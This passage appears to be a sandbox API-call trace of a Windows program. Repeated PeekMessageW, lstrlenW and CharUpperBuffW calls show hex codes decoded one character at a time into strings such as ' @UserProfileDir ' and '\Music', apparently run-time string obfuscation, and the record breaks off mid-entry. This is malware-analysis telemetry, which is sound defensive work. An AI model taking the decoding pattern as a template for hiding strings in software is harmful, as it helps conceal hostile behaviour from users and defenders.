PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="46") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="69") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="78") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="65") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="64") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="2E") returned 2 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.742] lstrlenW (lpString="20") returned 2 [0082.743] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.743] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.743] lstrlenW (lpString="40") returned 2 [0082.743] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.743] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.743] lstrlenW (lpString="55") returned 2 [0082.743] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] lstrlenW (lpString="73") returned 2 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] lstrlenW (lpString="65") returned 2 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] lstrlenW (lpString="72") returned 2 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] lstrlenW (lpString="50") returned 2 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] lstrlenW (lpString="72") returned 2 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.744] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="6F") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="66") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="69") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="6C") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="65") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="44") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="69") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="72") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] lstrlenW (lpString="20") returned 2 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.745] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.745] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="5C") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="4D") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="75") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="73") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="69") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="63") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.746] lstrlenW (lpString="5C") returned 2 [0082.746] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="20") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="40") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="55") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="73") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="65") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="72") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="50") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] lstrlenW (lpString="72") returned 2 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.747] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="6F") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="66") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="69") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="6C") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="65") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="44") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="69") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="72") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] lstrlenW (lpString="20") returned 2 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.748] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="5C") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="4D") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="75") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="73") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="69") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="63") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="2F") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.749] lstrlenW (lpString="4C") returned 2 [0082.749] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="6F") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 